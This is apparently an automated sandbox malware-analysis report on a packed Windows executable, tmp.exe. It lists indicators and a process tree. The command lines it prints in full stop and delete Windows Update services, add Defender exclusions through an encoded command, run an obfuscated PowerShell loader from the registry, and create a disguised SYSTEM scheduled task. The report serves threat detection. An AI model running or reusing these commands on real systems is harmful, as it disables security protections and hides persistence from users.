e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244

Analysis

max time kernel
151s
max time network
47s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
19-01-2023 04:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

4.9MB
MD5

e2c876ff5b1f24b59d928e595234cdef
SHA1

82d06b09b2a8c514929aab293242d4796d4ee39f
SHA256

e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244
SHA512

9562c0eb5485578c25f741beb5cb8206b2b4c7037e9a3bfa553ff833280c6788f730808e6fa93c7100486cd7877a33adddf8225944779638d304d1a42c66d7fd
SSDEEP

98304:ZXMmA6BgrvHq3uwG/9SopFAVrSkgAm2K2fklNvpJtpqCutXE:ZXb0TwmFzQ5PK2fklNvpJyCut

Score

10^/10

discovery evasion exploit vmprotect

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1484 created 416 1484 powershell.EXE winlogon.exe
PID 876 created 416 876 powershell.EXE winlogon.exe
Drops file in Drivers directory 1 IoCs

Processes:

tmp.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts tmp.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1152 takeown.exe
564 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	pid	process	target process
PID 1484 created 416	1484	powershell.EXE	winlogon.exe
PID 876 created 416	876	powershell.EXE	winlogon.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tmp.exe

pid	process
1152	takeown.exe
564	icacls.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/1952-54-0x0000000000880000-0x000000000120A000-memory.dmp	vmprotect

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1716 cmd.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1152 takeown.exe
564 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

pid	process
1716	cmd.exe

pid	process
1152	takeown.exe
564	icacls.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXEpowershell.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

tmp.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1952 set thread context of 816	1952	tmp.exe	conhost.exe
PID 1484 set thread context of 684	1484	powershell.EXE	dllhost.exe
PID 876 set thread context of 1684	876	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

tmp.exe

description	ioc	process
File created	C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	tmp.exe
File opened for modification	C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	tmp.exe

Drops file in Windows directory 6 IoCs

Processes:

conhost.exesvchost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1060 sc.exe
968 sc.exe
1448 sc.exe
524 sc.exe
1828 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

616 schtasks.exe

pid	process
1060	sc.exe
968	sc.exe
1448	sc.exe
524	sc.exe
1828	sc.exe

pid	process
616	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0ddbbdcca2bd901	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

608 reg.exe
1404 reg.exe
1736 reg.exe
1204 reg.exe
1532 reg.exe
1116 reg.exe
1904 reg.exe
896 reg.exe
432 reg.exe

pid	process
608	reg.exe
1404	reg.exe
1736	reg.exe
1204	reg.exe
1532	reg.exe
1116	reg.exe
1904	reg.exe
896	reg.exe
432	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

tmp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tmp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tmp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exetmp.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
1252	powershell.exe
1952	tmp.exe
1484	powershell.EXE
1484	powershell.EXE
876	powershell.EXE
684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
876	powershell.EXE
1684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
1684	dllhost.exe
684	dllhost.exe
684	dllhost.exe
684	dllhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exetmp.exepowercfg.exetakeown.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeShutdownPrivilege	528	powercfg.exe
Token: SeShutdownPrivilege	1056	powercfg.exe
Token: SeShutdownPrivilege	1524	powercfg.exe
Token: SeDebugPrivilege	1952	tmp.exe
Token: SeShutdownPrivilege	1496	powercfg.exe
Token: SeTakeOwnershipPrivilege	1152	takeown.exe
Token: SeDebugPrivilege	1484	powershell.EXE
Token: SeDebugPrivilege	1484	powershell.EXE
Token: SeDebugPrivilege	876	powershell.EXE
Token: SeDebugPrivilege	684	dllhost.exe
Token: SeDebugPrivilege	876	powershell.EXE
Token: SeDebugPrivilege	1684	dllhost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

860 svchost.exe

pid	process
860	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exe

description	pid	process	target process
PID 1952 wrote to memory of 1252	1952	tmp.exe	powershell.exe
PID 1952 wrote to memory of 1252	1952	tmp.exe	powershell.exe
PID 1952 wrote to memory of 1252	1952	tmp.exe	powershell.exe
PID 1952 wrote to memory of 428	1952	tmp.exe	cmd.exe
PID 1952 wrote to memory of 428	1952	tmp.exe	cmd.exe
PID 1952 wrote to memory of 428	1952	tmp.exe	cmd.exe
PID 1952 wrote to memory of 1296	1952	tmp.exe	cmd.exe
PID 1952 wrote to memory of 1296	1952	tmp.exe	cmd.exe
PID 1952 wrote to memory of 1296	1952	tmp.exe	cmd.exe
PID 428 wrote to memory of 524	428	cmd.exe	sc.exe
PID 428 wrote to memory of 524	428	cmd.exe	sc.exe
PID 428 wrote to memory of 524	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1828	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1828	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1828	428	cmd.exe	sc.exe
PID 1296 wrote to memory of 528	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 528	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 528	1296	cmd.exe	powercfg.exe
PID 428 wrote to memory of 1060	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1060	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1060	428	cmd.exe	sc.exe
PID 428 wrote to memory of 968	428	cmd.exe	sc.exe
PID 428 wrote to memory of 968	428	cmd.exe	sc.exe
PID 428 wrote to memory of 968	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1448	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1448	428	cmd.exe	sc.exe
PID 428 wrote to memory of 1448	428	cmd.exe	sc.exe
PID 1296 wrote to memory of 1056	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 1056	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 1056	1296	cmd.exe	powercfg.exe
PID 428 wrote to memory of 1904	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1904	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1904	428	cmd.exe	reg.exe
PID 428 wrote to memory of 896	428	cmd.exe	reg.exe
PID 428 wrote to memory of 896	428	cmd.exe	reg.exe
PID 428 wrote to memory of 896	428	cmd.exe	reg.exe
PID 1296 wrote to memory of 1524	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 1524	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 1524	1296	cmd.exe	powercfg.exe
PID 428 wrote to memory of 432	428	cmd.exe	reg.exe
PID 428 wrote to memory of 432	428	cmd.exe	reg.exe
PID 428 wrote to memory of 432	428	cmd.exe	reg.exe
PID 428 wrote to memory of 608	428	cmd.exe	reg.exe
PID 428 wrote to memory of 608	428	cmd.exe	reg.exe
PID 428 wrote to memory of 608	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1404	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1404	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1404	428	cmd.exe	reg.exe
PID 1296 wrote to memory of 1496	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 1496	1296	cmd.exe	powercfg.exe
PID 1296 wrote to memory of 1496	1296	cmd.exe	powercfg.exe
PID 428 wrote to memory of 1152	428	cmd.exe	takeown.exe
PID 428 wrote to memory of 1152	428	cmd.exe	takeown.exe
PID 428 wrote to memory of 1152	428	cmd.exe	takeown.exe
PID 428 wrote to memory of 564	428	cmd.exe	icacls.exe
PID 428 wrote to memory of 564	428	cmd.exe	icacls.exe
PID 428 wrote to memory of 564	428	cmd.exe	icacls.exe
PID 428 wrote to memory of 1736	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1736	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1736	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1204	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1204	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1204	428	cmd.exe	reg.exe
PID 428 wrote to memory of 1532	428	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1192

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1036

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of UnmapMainImage
PID:860

C:\Windows\system32\taskeng.exe
taskeng.exe {AC443445-2A9A-4E28-96C1-829A1F55DCF7} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:580

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{02b160d4-f3a1-44bd-a0ce-afabc6c86f8c}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{097bfcf0-27ac-41e4-a9f9-0417c67ba9c9}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1956

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1324

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:524

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1828

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1060

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:968

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1448

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1904

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:896

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:432

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:608

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1404

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:564

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1736

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1204

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1532

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1780

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1744

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1660

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2032

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
3⤵
PID:1560

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
4⤵
- Creates scheduled task(s)
PID:616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "
3⤵
PID:1904

C:\Windows\system32\schtasks.exe
schtasks /run /tn "Microsoft Edge Update "
4⤵
PID:548

C:\Windows\System32\cmd.exe
